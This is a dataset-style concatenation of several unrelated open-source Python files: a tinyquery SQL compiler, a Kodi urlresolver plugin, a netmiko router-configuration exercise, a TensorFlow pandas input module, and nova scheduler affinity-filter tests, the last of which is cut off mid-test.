# Joins are special: the aliases default to a fully-qualified name.
if isinstance(table_expr, typed_ast.Join):
alias = table_name + '.' + col_name
else:
alias = col_name
star_select_fields.append(
tq_ast.SelectField(tq_ast.ColumnId(col_ref), alias, None))
result_fields = []
for field in select_fields:
if isinstance(field, tq_ast.Star):
result_fields.extend(star_select_fields)
elif (field.expr and isinstance(field.expr, tq_ast.ColumnId) and
field.expr.name.endswith('.*')):
prefix = field.expr.name[:-len('.*')]
record_star_fields = [f
for f in star_select_fields
if f.alias.startswith(prefix)]
result_fields.extend(record_star_fields)
else:
result_fields.append(field)
return result_fields
def compile_group_fields(self, select_fields, aliases, within_clauses,
group_set, table_ctx):
"""Compile grouped select fields and compute a type context to use.
Arguments:
select_fields: A list of uncompiled select fields.
aliases: A list of aliases that matches with select_fields.
within_clauses: A list of within clause expression corresponding
to the select_fields.
group_set: A GroupSet for the groups to use.
table_ctx: A type context for the table being selected.
Returns:
compiled_field_dict: An OrderedDict from alias to compiled select
field for the grouped-by select fields. We use an OrderedDict
so the order is predictable to make testing easier.
aggregate_context: A type context that can be used when evaluating
aggregate select fields.
"""
compiled_field_dict = collections.OrderedDict()
group_columns = collections.OrderedDict()
if group_set is not None:
for field_group in group_set.field_groups:
group_columns[
(field_group.table, field_group.column)] = field_group.type
for alias, within_clause, select_field in zip(aliases, within_clauses,
select_fields):
if group_set is None or alias in group_set.alias_groups:
compiled_field_dict[alias] = self.compile_select_field(
select_field.expr, alias, within_clause, table_ctx)
group_columns[
(None, alias)] = compiled_field_dict[alias].expr.type
aggregate_context = type_context.TypeContext.from_full_columns(
group_columns, aggregate_context=table_ctx)
return compiled_field_dict, aggregate_context
def find_used_column_context(self, select_field_list):
"""Given a list of compiled SelectFields, find the used columns.
The return value is a TypeContext for the columns accessed, so that
these columns can be used in outer selects, but at lower precedence
than normal select fields.
This may also be used in the future to determine which fields to
actually take from the table.
"""
column_references = collections.OrderedDict()
for select_field in select_field_list:
column_references.update(
self.find_column_references(select_field.expr))
return type_context.TypeContext.from_full_columns(column_references)
def find_column_references(self, expr):
"""Return an OrderedDict of (table, column) -> type."""
if (isinstance(expr, typed_ast.FunctionCall) or
isinstance(expr, typed_ast.AggregateFunctionCall)):
result = collections.OrderedDict()
for arg in expr.args:
result.update(self.find_column_references(arg))
return result
elif isinstance(expr, typed_ast.ColumnRef):
return collections.OrderedDict(
[((expr.table, expr.column), expr.type)])
elif isinstance(expr, typed_ast.Literal):
return collections.OrderedDict()
else:
assert False, 'Unexpected type: %s' % type(expr)
def compile_table_expr(self, table_expr):
"""Compile a table expression and determine its result type context.
Arguments:
table_expr: Either None (indicating that there no table being
selected or a TableId.
Returns: A typed_ast.TableExpression.
"""
if table_expr is None:
return typed_ast.NoTable()
else:
try:
method = getattr(self, 'compile_table_expr_' +
table_expr.__class__.__name__)
except AttributeError:
raise NotImplementedError('Missing handler for type {}'.format(
table_expr.__class__.__name__
))
return method(table_expr)
def compile_table_expr_TableId(self, table_expr):
from tinyquery import tinyquery # TODO(colin): fix circular import
table = self.tables_by_name[table_expr.name]
if isinstance(table, tinyquery.Table):
return self.compile_table_ref(table_expr, table)
elif isinstance(table, tinyquery.View):
return self.compile_view_ref(table_expr, table)
else:
raise NotImplementedError('Unknown table type %s.' % type(table))
def compile_table_ref(self, table_expr, table):
alias = table_expr.alias or table_expr.name
columns = collections.OrderedDict([
(name, column.type) for name, column in table.columns.items()
])
type_ctx = type_context.TypeContext.from_table_and_columns(
alias, columns, None)
return typed_ast.Table(table_expr.name, type_ctx)
def compile_view_ref(self, table_expr, view):
# TODO(alan): This code allows fields from the view's implicit column
# context to be selected, which probably isn't allowed in regular
# BigQuery.
# TODO(alan): We should check for cycles when evaluating views.
# Otherwise, circular views will cause an infinite loop.
# The view keeps its query as regular text, so we need to lex and parse
# it, then include it as if it was a subquery. It's almost correct to
# re-use the subquery compiling code, except that subquery aliases have
# special semantics that we don't want to use; an alias on a view
# should count for all returned fields.
alias = table_expr.alias or table_expr.name
uncompiled_view_ast = parser.parse_text(view.query)
compiled_view_select = self.compile_select(uncompiled_view_ast)
# We always want to apply either the alias or the full table name to
# the returned type context.
new_type_context = (
compiled_view_select.type_ctx.context_with_full_alias(alias))
return compiled_view_select.with_type_ctx(new_type_context)
def compile_table_expr_TableUnion(self, table_expr):
compiled_tables = [
self.compile_table_expr(table) for table in table_expr.tables]
type_ctx = type_context.TypeContext.union_contexts(
table.type_ctx for table in compiled_tables)
return typed_ast.TableUnion(compiled_tables, type_ctx)
def compile_table_expr_Join(self, table_expr):
table_expressions = itertools.chain(
[table_expr.base],
(join_part.table_expr for join_part in table_expr.join_parts)
)
compiled_result = [self.compile_joined_table(x)
for x in table_expressions]
compiled_table_exprs, compiled_aliases = zip(*compiled_result)
type_contexts = [compiled_table.type_ctx
for compiled_table in compiled_table_exprs]
result_fields = self.compile_join_fields(
type_contexts,
compiled_aliases,
[join_part.condition for join_part in table_expr.join_parts],
[join_part.join_type for join_part in table_expr.join_parts]
)
result_type_ctx = type_context.TypeContext.join_contexts(
type_contexts)
return typed_ast.Join(
base=compiled_table_exprs[0],
# wrapping in list() for python 3 support (shouldn't be a
# large number of items so performance impact should be
# minimal)
tables=list(zip(compiled_table_exprs[1:],
(join_part.join_type
for join_part in table_expr.join_parts))),
conditions=result_fields,
type_ctx=result_type_ctx)
def compile_joined_table(self, table_expr):
"""Given one side of a JOIN, get its table expression and alias."""
compiled_table = self.compile_table_expr(table_expr)
if table_expr.alias is not None:
alias = table_expr.alias
elif isinstance(table_expr, tq_ast.TableId):
alias = table_expr.name
else:
raise exceptions.CompileError(
'Table expression must have an alias name.')
result_ctx = compiled_table.type_ctx.context_with_full_alias(alias)
compiled_table = compiled_table.with_type_ctx(result_ctx)
return compiled_table, alias
def compile_join_fields(self, type_contexts, aliases, conditions,
join_types):
"""Traverse a join condition to find the joined fields.
Arguments:
type_contexts: a list of TypeContexts for the tables being
joined.
aliases: a list of aliases for the tables being joined.
conditions: an list of instances of tq_ast.BinaryOperator
expressing the condition on which each table is being joined.
join_types: a list of instances of tq_ast.JoinType corresponding to
the type of each join
Returns: A list of JoinFields instances for the expression.
TODO(colin): is this where we should check that the conditions are
sufficient for joining all the tables?
"""
def compile_join_field(expr, join_type):
"""Compile a single part of the join.
This results in a list of one or more join fields, depending on
whether or not multiple are ANDed together.
"""
if join_type is tq_ast.JoinType.CROSS:
assert expr is None, (
"Cross joins do not allow join conditions.")
return [None]
if isinstance(expr, tq_ast.BinaryOperator):
if expr.operator == 'and':
return list(itertools.chain(
compile_join_field(expr.left, join_type),
compile_join_field(expr.right, join_type)))
elif (expr.operator in ('=', '==') and
isinstance(expr.left, tq_ast.ColumnId) and
isinstance(expr.right, tq_ast.ColumnId)):
# For evaluation, we want the ordering of the columns in
# the JoinField to match the ordering of the join, left to
# right, but bigquery allows either order. Thus we need to
# reorder them if they're reversed.
# TODO(colin): better error message if we don't find an
# alias?
lhs_alias_idx = next(
idx
for idx, alias in enumerate(aliases)
if expr.left.name.startswith(alias + ".")
)
rhs_alias_idx = next(
idx
for idx, alias in enumerate(aliases)
if expr.right.name.startswith(alias + ".")
)
left_column_id = self.compile_ColumnId(
expr.left,
type_contexts[lhs_alias_idx])
right_column_id = self.compile_ColumnId(
expr.right,
type_contexts[rhs_alias_idx])
if lhs_alias_idx < rhs_alias_idx:
return [typed_ast.JoinFields(left_column_id,
right_column_id)]
elif rhs_alias_idx < lhs_alias_idx:
return [typed_ast.JoinFields(right_column_id,
left_column_id)]
# Fall through to the error case if the aliases are the
# same for both sides.
raise exceptions.CompileError(
'JOIN conditions must consist of an AND of = '
'comparisons between two field on distinct '
'tables. Got expression %s' % expr)
return [compile_join_field(expr, join_type)
for expr, join_type in zip(conditions, join_types)]
def compile_table_expr_Select(self, table_expr):
select_result = self.compile_select(table_expr)
if table_expr.alias is not None:
new_type_context = (select_result.type_ctx.
context_with_subquery_alias(table_expr.alias))
select_result = select_result.with_type_ctx(new_type_context)
return select_result
def compile_groups(self, groups, select_fields, aliases, table_ctx):
"""Gets the group set to use for the query.
This involves handling the special cases when no GROUP BY statement
exists, and also determining whether each group should be treated as an
alias group or a field group.
Arguments:
groups: Either None, indicating that no GROUP BY was specified, or
a list of strings from the GROUP BY.
select_fields: A list of tq_ast.SelectField objects for the query
we are compiling.
aliases: The aliases we will assign to the select fields.
table_ctx: The TypeContext from the table expression in the SELECT.
"""
if groups is None:
# Special case: if no GROUP BY was specified, we're an aggregate
# query iff at least one select field has an aggregate function.
is_aggregate_select = any(
self.expression_contains_aggregate(field.expr)
for field in select_fields)
if is_aggregate_select:
# Group such that everything is in the same group.
return typed_ast.TRIVIAL_GROUP_SET
else:
# Don't do any grouping at all.
return None
else:
# At least one group was specified, so this is definitely a
# GROUP BY query and we need to figure out what they refer to.
alias_groups = set()
field_groups = []
alias_set = set(aliases)
for group in groups:
if group.name in alias_set:
alias_groups.add(group.name)
else:
# Will raise an exception if not found.
# TODO: This doesn't perfectly match BigQuery's approach.
# In BigQuery, grouping by my_table.my_value will make
# either my_table.my_value or my_value valid ways of
# referring to the group, whereas grouping by my_value will
# make it so only my_value is a valid way of referring to
# the group. The whole approach to implicit table
# references could potentially be rethought.
field_groups.append(
table_ctx.column_ref_for_name(group.name))
return typed_ast.GroupSet(alias_groups, field_groups)
def compile_select_field(self, expr, alias, within_clause, type_ctx):
if within_clause is not None and within_clause != 'RECORD' and (
expr.args[0].name.split('.')[0] != within_clause):
raise exceptions.CompileError('WITHIN clause syntax error')
else:
compiled_expr = self.compile_expr(expr, type_ctx)
return typed_ast.SelectField(compiled_expr, alias, within_clause)
def compile_filter_expr(self, filter_expr, table_ctx):
"""If there is a WHERE or HAVING expression, compile it.
If the filter expression is missing, we just use the literal true.
"""
if filter_expr:
return self.compile_expr(filter_expr, table_ctx)
else:
return typed_ast.Literal(True, tq_types.BOOL)
def compile_expr(self, expr, type_ctx):
try:
method = getattr(self, 'compile_' + expr.__class__.__name__)
except AttributeError:
raise NotImplementedError(
'Missing handler for type {}'.format(expr.__class__.__name__))
return method(expr, type_ctx)
def compile_ColumnId(self, expr, type_ctx):
return type_ctx.column_ref_for_name(expr.name)
def compile_Literal(self, expr, type_ctx):
if isinstance(expr.value, bool):
return typed_ast.Literal(expr.value, tq_types.BOOL)
if isinstance(expr.value, int):
return typed_ast.Literal(expr.value, tq_types.INT)
if isinstance(expr.value, float):
return typed_ast.Literal(expr.value, tq_types.FLOAT)
elif isinstance(expr.value, tq_types.STRING_TYPE):
return typed_ast.Literal(expr.value, tq_types.STRING)
elif expr.value is None:
return typed_ast.Literal(expr.value, tq_types.NONETYPE)
else:
raise NotImplementedError('Unrecognized type: {}'.format(
type(expr.value)))
# TODO(Samantha): Don't pass the type, just pass the column so that mode is
# included.
def compile_UnaryOperator(self, expr, type_ctx):
func = runtime.get_unary_op(expr.operator)
compiled_val = self.compile_expr(expr.expr, type_ctx)
try:
result_type = func.check_types(compiled_val.type)
except TypeError:
raise exceptions.CompileError(
'Invalid type for operator {}: {}'.format(
expr.operator, [compiled_val.type]))
return typed_ast.FunctionCall(func, [compiled_val], result_type)
# TODO(Samantha): Don't pass the type, just pass the column so that mode is
# included.
def compile_BinaryOperator(self, expr, type_ctx):
func = runtime.get_binary_op(expr.operator)
compiled_left = self.compile_expr(expr.left, type_ctx)
compiled_right = self.compile_expr(expr.right, type_ctx)
try:
result_type = func.check_types(compiled_left.type,
compiled_right.type)
except TypeError:
raise exceptions.CompileError(
'Invalid types for operator {}: {}'.format(
expr.operator, [arg.type for arg in [compiled_left,
compiled_right]]))
return typed_ast.FunctionCall(
func, [compiled_left, compiled_right], result_type)
# TODO(Samantha): Don't pass the type, just pass the column so that mode is
# included.
def compile_FunctionCall(self, expr, type_ctx):
# Innermost aggregates are special, since the context to use changes
# inside them. We also need to generate an AggregateFunctionCall AST so
# that the evaluator knows to change the context.
if self.is_innermost_aggregate(expr):
if type_ctx.aggregate_context is None:
raise exceptions.CompileError('Unexpected aggregate function.')
sub_expr_ctx = type_ctx.aggregate_context
ast_type = typed_ast.AggregateFunctionCall
else:
sub_expr_ctx = type_ctx
ast_type = typed_ast.FunctionCall
func = runtime.get_func(expr.name)
compiled_args = [self.compile_expr(sub_expr, sub_expr_ctx)
for sub_expr in expr.args]
try:
result_type = func.check_types(
*(arg.type for arg in compiled_args))
except TypeError:
raise exceptions.CompileError(
'Invalid types for function {}: {}'.format(
expr.name, [arg.type for arg in compiled_args]))
return ast_type(func, compiled_args, result_type)
def compile_CaseExpression(self, expr, type_ctx):
"""Compile a CASE expression by converting to nested IF calls."""
def compile_helper(remaining_clauses):
if len(remaining_clauses) == 0:
return tq_ast.Literal(value=None)
clause = remaining_clauses[0]
return tq_ast.FunctionCall(
name='if',
args=[clause.condition,
clause.result_expr,
compile_helper(remaining_clauses[1:])])
case_as_nested_if = compile_helper(expr.clauses)
return self.compile_FunctionCall(case_as_nested_if, type_ctx)
@classmethod
def get_aliases(cls, select_field_list):
"""Given a list of tq_ast.SelectField, return the aliases to use."""
used_aliases = set()
proposed_aliases = [cls.field_alias(select_field)
for select_field in select_field_list]
for alias in proposed_aliases:
if alias is not None:
if alias in used_aliases:
raise exceptions.CompileError(
'Ambiguous column name {}.'.format(alias))
used_aliases.add(alias)
generic_field_num = 0
result = []
for alias in proposed_aliases:
if alias is not None:
result.append(alias)
else:
while ('f%s_' % generic_field_num) in used_aliases:
generic_field_num += 1
result.append('f%s_' % generic_field_num)
generic_field_num += 1
return result
@classmethod
def get_within_clauses(cls, select_field_list):
return [select_field.within_record
for select_field in select_field_list]
@staticmethod
def field_alias(select_field):
"""Gets the alias to use, or None if it's not specified."""
if select_field.alias is not None:
return select_field.alias
if isinstance(select_field.expr, tq_ast.ColumnId):
return select_field.expr.name
return None
@classmethod
def expression_contains_aggregate(cls, expr):
"""Given a tq_ast expression, check if it does any aggregation.
We need to operate on an uncompiled AST here since we use this
information to figure out how to compile these expressions.
"""
if isinstance(expr, tq_ast.UnaryOperator):
return cls.expression_contains_aggregate(expr.expr)
elif isinstance(expr, tq_ast.BinaryOperator):
return (cls.expression_contains_aggregate(expr.left) or
cls.expression_contains_aggregate(expr.right))
elif isinstance(expr, tq_ast.FunctionCall):
return (runtime.is_aggregate_func(expr.name) or
any(cls.expression_contains_aggregate(arg)
for arg in expr.args))
elif isinstance(expr, tq_ast.CaseExpression):
return False
elif isinstance(expr, tq_ast.Literal):
return False
elif isinstance(expr, tq_ast.ColumnId):
return False
else:
assert False, 'Unexpected expression type: %s' % (
expr.__class__.__name__)
@classmethod
def is_innermost_aggregate(cls, expr):
"""Return True if the given expression is an innermost aggregate.
Only arguments to innermost aggregates actually have access to fields
from the original table expression, so we need to detect this case
specifically.
You might think that repeatedly calling this function while traversing
the tree takes quadratic time in the size of the tree, but it actually
only takes linear time overall. There's a nice proof of this fact,
which this docstring is to small to contain.
"""
return (isinstance(expr, tq_ast.FunctionCall) and
runtime.is_aggregate_func(expr.name) and
not any(cls.expression_contains_aggregate(sub_expr)
for sub_expr in expr.args))
| mit | -3,294,859,790,084,400,000 | 44.826291 | 79 | 0.58464 | false |
Lynx187/script.module.urlresolver | lib/urlresolver/plugins/promptfile.py | 3 | 2319 | '''
urlresolver XBMC Addon
Copyright (C) 2013 Bstrdsmkr
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import re
from t0mm0.common.net import Net
from urlresolver.plugnplay.interfaces import UrlResolver
from urlresolver.plugnplay.interfaces import PluginSettings
from urlresolver.plugnplay import Plugin
from urlresolver import common
class PromptfileResolver(Plugin, UrlResolver, PluginSettings):
implements = [UrlResolver, PluginSettings]
name = "promptfile"
domains = ["promptfile.com"]
def __init__(self):
p = self.get_setting('priority') or 100
self.priority = int(p)
self.net = Net()
self.pattern = '//((?:www.)?promptfile.com)/(?:l|e)/([0-9A-Za-z\-]+)'
def get_media_url(self, host, media_id):
web_url = self.get_url(host, media_id)
html = self.net.http_GET(web_url).content
data = {}
r = re.findall(r'type="hidden"\s*name="(.+?)"\s*value="(.*?)"', html)
for name, value in r:
data[name] = value
html = self.net.http_POST(web_url, data).content
html = re.compile(r'clip\s*:\s*\{.*?url\s*:\s*[\"\'](.+?)[\"\']', re.DOTALL).search(html)
if not html:
raise UrlResolver.ResolverError('File Not Found or removed')
stream_url = html.group(1)
return stream_url
def get_url(self, host, media_id):
return 'http://www.promptfile.com/e/%s' % (media_id)
def get_host_and_id(self, url):
r = re.search(self.pattern, url)
if r:
return r.groups()
else:
return False
def valid_url(self, url, host):
if self.get_setting('enabled') == 'false': return False
return re.search(self.pattern, url) or 'promptfile' in host
| gpl-2.0 | 4,043,755,656,440,541,700 | 36.403226 | 97 | 0.65718 | false |
msifuentes/pynet_ansible | test_python/netmiko_wk4_ex7.py | 2 | 1955 | #!/usr/bin/env python
#Import libraries
from netmiko import ConnectHandler
from getpass import getpass
#define variables for the connection to network devices
ip_addr = '50.76.53.27'
username = 'pyclass'
password = getpass()
portpy2 = 8022
portsrx = 9822
cisco = 'cisco_ios'
juniper = 'juniper'
#create a dictionary of the devices you are going to make a connections with
pynetrtr1 = {
'device_type': cisco,
'ip': ip_addr,
'username': username,
'password': password,
}
pynetrtr2 = {
'device_type': cisco,
'ip': ip_addr,
'username': username,
'password': password,
'port': portpy2,
}
juniper_srx = {
'device_type': juniper,
'ip': ip_addr,
'username': username,
'password': password,
'secret': '',
'port': portsrx,
}
#This tests that the mapping of the dictonary to the variables is working
# print pynetrtr1
print pynetrtr2
# print juniper_srx
#This uses makes the connection to the network devices defined.
#the ** is used to help pass all the dictionary information alone
# rtr1 = ConnectHandler(**pynetrtr1)
rtr2 = ConnectHandler(**pynetrtr2)
# srx = ConnectHandler(**juniper_srx)
#this output will confirm that the connection was made with netmiko and the ssh information used to make the connection
# print rtr1
print rtr2
# print srx
#this will place rtr2 into config mode and will display the output to confirm we are in that mode.
rtr2.config_mode()
outp_show = rtr2.find_prompt()
print outp_show
#then we will set the logging buffer to 11100
rtr2.send_command("logging buffer 11100")
rtr2.exit_config_mode()
outp_show = rtr2.send_command("show run | i logging")
print outp_show
#this closes the connection. Without out this command the connection stays open until the vty idle timer kicks in.
# rtr1.disconnect()
rtr2.disconnect()
#On the srx the connection is not a clean disconnect. the connection from the server sits in fin_wait
# srx.disconnect()
| apache-2.0 | -7,625,436,891,656,848,000 | 24.38961 | 119 | 0.717136 | false |
AsimmHirani/ISpyPi | tensorflow/contrib/tensorflow-master/tensorflow/contrib/learn/python/learn/learn_io/pandas_io.py | 4 | 6562 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Methods to allow pandas.DataFrame."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.contrib.learn.python.learn.dataframe.queues import feeding_functions
try:
# pylint: disable=g-import-not-at-top
import pandas as pd
HAS_PANDAS = True
except IOError:
# Pandas writes a temporary file during import. If it fails, don't use pandas.
HAS_PANDAS = False
except ImportError:
HAS_PANDAS = False
PANDAS_DTYPES = {
'int8': 'int',
'int16': 'int',
'int32': 'int',
'int64': 'int',
'uint8': 'int',
'uint16': 'int',
'uint32': 'int',
'uint64': 'int',
'float16': 'float',
'float32': 'float',
'float64': 'float',
'bool': 'i'
}
def extract_pandas_data(data):
"""Extract data from pandas.DataFrame for predictors.
Given a DataFrame, will extract the values and cast them to float. The
DataFrame is expected to contain values of type int, float or bool.
Args:
data: `pandas.DataFrame` containing the data to be extracted.
Returns:
A numpy `ndarray` of the DataFrame's values as floats.
Raises:
ValueError: if data contains types other than int, float or bool.
"""
if not isinstance(data, pd.DataFrame):
return data
bad_data = [column for column in data
if data[column].dtype.name not in PANDAS_DTYPES]
if not bad_data:
return data.values.astype('float')
else:
error_report = [("'" + str(column) + "' type='" +
data[column].dtype.name + "'") for column in bad_data]
raise ValueError('Data types for extracting pandas data must be int, '
'float, or bool. Found: ' + ', '.join(error_report))
def extract_pandas_matrix(data):
"""Extracts numpy matrix from pandas DataFrame.
Args:
data: `pandas.DataFrame` containing the data to be extracted.
Returns:
A numpy `ndarray` of the DataFrame's values.
"""
if not isinstance(data, pd.DataFrame):
return data
return data.as_matrix()
def extract_pandas_labels(labels):
"""Extract data from pandas.DataFrame for labels.
Args:
labels: `pandas.DataFrame` or `pandas.Series` containing one column of
labels to be extracted.
Returns:
A numpy `ndarray` of labels from the DataFrame.
Raises:
ValueError: if more than one column is found or type is not int, float or
bool.
"""
if isinstance(labels,
pd.DataFrame): # pandas.Series also belongs to DataFrame
if len(labels.columns) > 1:
raise ValueError('Only one column for labels is allowed.')
bad_data = [column for column in labels
if labels[column].dtype.name not in PANDAS_DTYPES]
if not bad_data:
return labels.values
else:
error_report = ["'" + str(column) + "' type="
+ str(labels[column].dtype.name) for column in bad_data]
raise ValueError('Data types for extracting labels must be int, '
'float, or bool. Found: ' + ', '.join(error_report))
else:
return labels
def pandas_input_fn(x,
y=None,
batch_size=128,
num_epochs=1,
shuffle=True,
queue_capacity=1000,
num_threads=1,
target_column='target'):
"""Returns input function that would feed Pandas DataFrame into the model.
Note: `y`'s index must match `x`'s index.
Args:
x: pandas `DataFrame` object.
y: pandas `Series` object.
batch_size: int, size of batches to return.
num_epochs: int, number of epochs to iterate over data. If not `None`,
read attempts that would exceed this value will raise `OutOfRangeError`.
shuffle: bool, whether to read the records in random order.
queue_capacity: int, size of the read queue. If `None`, it will be set
roughly to the size of `x`.
num_threads: int, number of threads used for reading and enqueueing.
target_column: str, name to give the target column `y`.
Returns:
Function, that has signature of ()->(dict of `features`, `target`)
Raises:
ValueError: if `x` already contains a column with the same name as `y`, or
if the indexes of `x` and `y` don't match.
"""
x = x.copy()
if y is not None:
if target_column in x:
raise ValueError(
'Cannot use name %s for target column: DataFrame already has a '
'column with that name: %s' % (target_column, x.columns))
if not np.array_equal(x.index, y.index):
raise ValueError('Index for x and y are mismatched.\nIndex for x: %s\n'
'Index for y: %s\n' % (x.index, y.index))
x[target_column] = y
# TODO(mdan): These are memory copies. We probably don't need 4x slack space.
# The sizes below are consistent with what I've seen elsewhere.
if queue_capacity is None:
if shuffle:
queue_capacity = 4 * len(x)
else:
queue_capacity = len(x)
min_after_dequeue = max(queue_capacity / 4, 1)
def input_fn():
"""Pandas input function."""
queue = feeding_functions.enqueue_data(
x,
queue_capacity,
shuffle=shuffle,
min_after_dequeue=min_after_dequeue,
num_threads=num_threads,
enqueue_size=batch_size,
num_epochs=num_epochs)
if num_epochs is None:
features = queue.dequeue_many(batch_size)
else:
features = queue.dequeue_up_to(batch_size)
assert len(features) == len(x.columns) + 1, ('Features should have one '
'extra element for the index.')
features = features[1:]
features = dict(zip(list(x.columns), features))
if y is not None:
target = features.pop(target_column)
return features, target
return features
return input_fn
| apache-2.0 | -4,111,842,622,375,606,300 | 31.646766 | 84 | 0.631667 | false |
mikalstill/nova | nova/tests/unit/scheduler/filters/test_affinity_filters.py | 6 | 10892 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from oslo_utils.fixture import uuidsentinel as uuids
from nova import objects
from nova.scheduler.filters import affinity_filter
from nova import test
from nova.tests.unit.scheduler import fakes
class TestDifferentHostFilter(test.NoDBTestCase):
def setUp(self):
super(TestDifferentHostFilter, self).setUp()
self.filt_cls = affinity_filter.DifferentHostFilter()
def test_affinity_different_filter_passes(self):
host = fakes.FakeHostState('host1', 'node1', {})
inst1 = objects.Instance(uuid=uuids.instance)
host.instances = {inst1.uuid: inst1}
spec_obj = objects.RequestSpec(
context=mock.sentinel.ctx,
scheduler_hints=dict(different_host=['same']))
self.assertTrue(self.filt_cls.host_passes(host, spec_obj))
def test_affinity_different_filter_fails(self):
inst1 = objects.Instance(uuid=uuids.instance)
host = fakes.FakeHostState('host1', 'node1', {})
host.instances = {inst1.uuid: inst1}
spec_obj = objects.RequestSpec(
context=mock.sentinel.ctx,
scheduler_hints=dict(different_host=[uuids.instance]))
self.assertFalse(self.filt_cls.host_passes(host, spec_obj))
def test_affinity_different_filter_handles_none(self):
inst1 = objects.Instance(uuid=uuids.instance)
host = fakes.FakeHostState('host1', 'node1', {})
host.instances = {inst1.uuid: inst1}
spec_obj = objects.RequestSpec(
context=mock.sentinel.ctx,
scheduler_hints=None)
self.assertTrue(self.filt_cls.host_passes(host, spec_obj))
class TestSameHostFilter(test.NoDBTestCase):
def setUp(self):
super(TestSameHostFilter, self).setUp()
self.filt_cls = affinity_filter.SameHostFilter()
def test_affinity_same_filter_passes(self):
inst1 = objects.Instance(uuid=uuids.instance)
host = fakes.FakeHostState('host1', 'node1', {})
host.instances = {inst1.uuid: inst1}
spec_obj = objects.RequestSpec(
context=mock.sentinel.ctx,
scheduler_hints=dict(same_host=[uuids.instance]))
self.assertTrue(self.filt_cls.host_passes(host, spec_obj))
def test_affinity_same_filter_no_list_passes(self):
host = fakes.FakeHostState('host1', 'node1', {})
host.instances = {}
spec_obj = objects.RequestSpec(
context=mock.sentinel.ctx,
scheduler_hints=dict(same_host=['same']))
self.assertFalse(self.filt_cls.host_passes(host, spec_obj))
def test_affinity_same_filter_fails(self):
inst1 = objects.Instance(uuid=uuids.instance)
host = fakes.FakeHostState('host1', 'node1', {})
host.instances = {inst1.uuid: inst1}
spec_obj = objects.RequestSpec(
context=mock.sentinel.ctx,
scheduler_hints=dict(same_host=['same']))
self.assertFalse(self.filt_cls.host_passes(host, spec_obj))
def test_affinity_same_filter_handles_none(self):
inst1 = objects.Instance(uuid=uuids.instance)
host = fakes.FakeHostState('host1', 'node1', {})
host.instances = {inst1.uuid: inst1}
spec_obj = objects.RequestSpec(
context=mock.sentinel.ctx,
scheduler_hints=None)
self.assertTrue(self.filt_cls.host_passes(host, spec_obj))
class TestSimpleCIDRAffinityFilter(test.NoDBTestCase):
def setUp(self):
super(TestSimpleCIDRAffinityFilter, self).setUp()
self.filt_cls = affinity_filter.SimpleCIDRAffinityFilter()
def test_affinity_simple_cidr_filter_passes(self):
host = fakes.FakeHostState('host1', 'node1', {})
host.host_ip = '10.8.1.1'
affinity_ip = "10.8.1.100"
spec_obj = objects.RequestSpec(
context=mock.sentinel.ctx,
scheduler_hints=dict(
cidr=['/24'],
build_near_host_ip=[affinity_ip]))
self.assertTrue(self.filt_cls.host_passes(host, spec_obj))
def test_affinity_simple_cidr_filter_fails(self):
host = fakes.FakeHostState('host1', 'node1', {})
host.host_ip = '10.8.1.1'
affinity_ip = "10.8.1.100"
spec_obj = objects.RequestSpec(
context=mock.sentinel.ctx,
scheduler_hints=dict(
cidr=['/32'],
build_near_host_ip=[affinity_ip]))
self.assertFalse(self.filt_cls.host_passes(host, spec_obj))
def test_affinity_simple_cidr_filter_handles_none(self):
host = fakes.FakeHostState('host1', 'node1', {})
spec_obj = objects.RequestSpec(
context=mock.sentinel.ctx,
scheduler_hints=None)
self.assertTrue(self.filt_cls.host_passes(host, spec_obj))
class TestGroupAffinityFilter(test.NoDBTestCase):
def _test_group_anti_affinity_filter_passes(self, filt_cls, policy):
host = fakes.FakeHostState('host1', 'node1', {})
spec_obj = objects.RequestSpec(instance_group=None)
self.assertTrue(filt_cls.host_passes(host, spec_obj))
spec_obj = objects.RequestSpec(instance_group=objects.InstanceGroup(
policy='affinity'))
self.assertTrue(filt_cls.host_passes(host, spec_obj))
spec_obj = objects.RequestSpec(instance_group=objects.InstanceGroup(
policy=policy, members=[]), instance_uuid=uuids.fake)
spec_obj.instance_group.hosts = []
self.assertTrue(filt_cls.host_passes(host, spec_obj))
spec_obj.instance_group.hosts = ['host2']
self.assertTrue(filt_cls.host_passes(host, spec_obj))
def test_group_anti_affinity_filter_passes(self):
self._test_group_anti_affinity_filter_passes(
affinity_filter.ServerGroupAntiAffinityFilter(),
'anti-affinity')
def _test_group_anti_affinity_filter_fails(self, filt_cls, policy):
inst1 = objects.Instance(uuid=uuids.inst1)
# We already have an inst1 on host1
host = fakes.FakeHostState('host1', 'node1', {}, instances=[inst1])
spec_obj = objects.RequestSpec(
instance_group=objects.InstanceGroup(policy=policy,
hosts=['host1'],
members=[uuids.inst1],
rules={}),
instance_uuid=uuids.fake)
self.assertFalse(filt_cls.host_passes(host, spec_obj))
def test_group_anti_affinity_filter_fails(self):
self._test_group_anti_affinity_filter_fails(
affinity_filter.ServerGroupAntiAffinityFilter(),
'anti-affinity')
def _test_group_anti_affinity_filter_with_rules(self, rules, members):
filt_cls = affinity_filter.ServerGroupAntiAffinityFilter()
inst1 = objects.Instance(uuid=uuids.inst1)
inst2 = objects.Instance(uuid=uuids.inst2)
spec_obj = objects.RequestSpec(
instance_group=objects.InstanceGroup(policy='anti-affinity',
hosts=['host1'],
members=members,
